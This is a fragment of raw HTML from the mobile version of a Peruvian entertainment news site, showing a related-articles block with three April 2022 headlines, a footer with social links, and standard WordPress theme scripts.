itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png"><meta itemprop="width" content="1200"><meta itemprop="height" content="600"></span></footer></article><div class="td_block_wrap td_block_related_posts_mob tdi_1 td_with_ajax_pagination td-pb-border-top td_block_template_1"><h4 class="td-related-title">Artículos relacionados</h4><div id=tdi_1 class="td_block_inner"><div class="td-related-row"><div class="td-related-span4"><div class="td_module_mob_1 td_module_wrap td-animation-stack"><div class="td-module-thumb"><a href="https://elchoche.pe/espectaculo/organizador-de-concursos-de-belleza-pucallpino-sigue-dando-que-hablar/" rel="bookmark" class="td-image-wrap " title="Organizador de concursos de belleza pucallpino sigue dando que hablar" ><img decoding="async" width="265" height="198" class="entry-thumb" src="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_265,h_198/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-23-265x198.png"  srcset="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_265/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-23-265x198.png 265w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_485/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-23-485x360.png 485w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_80/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-23-80x60.png 80w" sizes="(max-width: 265px) 100vw, 265px"  alt="" title="Organizador de concursos de belleza pucallpino sigue dando que hablar" /></a></div><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://elchoche.pe/espectaculo/organizador-de-concursos-de-belleza-pucallpino-sigue-dando-que-hablar/" rel="bookmark" title="Organizador de concursos de belleza pucallpino sigue dando que hablar">Organizador de concursos de belleza pucallpino sigue dando que hablar</a></h3><div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-04-19T09:42:36-05:00" >19 Abril, 2022</time></span></div></div></div></div><div class="td-related-span4"><div class="td_module_mob_1 td_module_wrap td-animation-stack"><div class="td-module-thumb"><a href="https://elchoche.pe/espectaculo/cantante-brasilera-triunfa-en-la-orquesta-diversion-de-pucallpa/" rel="bookmark" class="td-image-wrap " title="CANTANTE BRASILERA TRIUNFA EN LA ORQUESTA “DIVERSION” DE PUCALLPA" ><img decoding="async" width="265" height="198" class="entry-thumb" src="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_265,h_198/https://elchoche.pe/wp-content/uploads/2022/04/25-cho-265x198.jpg"  srcset="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_265/https://elchoche.pe/wp-content/uploads/2022/04/25-cho-265x198.jpg 265w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_485/https://elchoche.pe/wp-content/uploads/2022/04/25-cho-485x360.jpg 485w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_80/https://elchoche.pe/wp-content/uploads/2022/04/25-cho-80x60.jpg 80w" sizes="(max-width: 265px) 100vw, 265px"  alt="" title="CANTANTE BRASILERA TRIUNFA EN LA ORQUESTA “DIVERSION” DE PUCALLPA" /></a></div><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://elchoche.pe/espectaculo/cantante-brasilera-triunfa-en-la-orquesta-diversion-de-pucallpa/" rel="bookmark" title="CANTANTE BRASILERA TRIUNFA EN LA ORQUESTA “DIVERSION” DE PUCALLPA">CANTANTE BRASILERA TRIUNFA EN LA ORQUESTA “DIVERSION” DE PUCALLPA</a></h3><div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-04-16T10:28:29-05:00" >16 Abril, 2022</time></span></div></div></div></div><div class="td-related-span4"><div class="td_module_mob_1 td_module_wrap td-animation-stack"><div class="td-module-thumb"><a href="https://elchoche.pe/espectaculo/uchulu-asegura-ser-una-mujer-trans/" rel="bookmark" class="td-image-wrap " title="Uchulu asegura ser una mujer trans" ><img decoding="async" width="265" height="198" class="entry-thumb" src="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_265,h_198/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-copia-265x198.jpg"  srcset="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_265/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-copia-265x198.jpg 265w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_485/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-copia-485x360.jpg 485w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_80/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-copia-80x60.jpg 80w" sizes="(max-width: 265px) 100vw, 265px"  alt="" title="Uchulu asegura ser una mujer trans" /></a></div><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://elchoche.pe/espectaculo/uchulu-asegura-ser-una-mujer-trans/" rel="bookmark" title="Uchulu asegura ser una mujer trans">Uchulu asegura ser una mujer trans</a></h3><div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-04-15T12:06:00-05:00" >15 Abril, 2022</time></span></div></div></div></div></div></div></div></div><div class="comments td-container" id="comments"><div class="td-comments-title-wrap "><h4 class="block-title"><span></span></h4></div></div><div class="td-mobile-footer-wrap"><div class="td-container"><div class="td-footer-wrap"><aside class="td-footer-logo"><a href="https://elchoche.pe/" aria-label="Logo"><img decoding="async" class="td-retina-data" src="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img/http://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg" data-retina="http://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg" alt="" title=""/></a></aside></div><div class="td-footer-wrap"><aside class="td-footer-description"><div class="block-title"><span>SOBRE NOSOTROS</span></div></aside></div><div class="td-footer-wrap"><aside class="td-footer-social"><div class="block-title"><span>SÍGUENOS</span></div> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Youtube"> <i class="td-icon-font td-icon-youtube"></i> </a> </span></aside></div></div></div><div class="td-mobile-sub-footer-wrap"><div class="td-container"><div class="td-sub-footer-menu"></div><div class="td-sub-footer-copy"> &copy; ©Desarrollado y Diseñado por PUCALLSYSTEM</div></div></div></div>  <script type='text/javascript' src='https://elchoche.pe/wp-content/plugins/td-composer/mobile/js/tagdiv_theme.min.js' id='td-site-js'></script> <script type='text/javascript' src='https://elchoche.pe/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>  <script></script> </body></html><!-- WP Fastest Cache file was created in 0.59378099441528 seconds, on 20-04-22 10:51:11 -->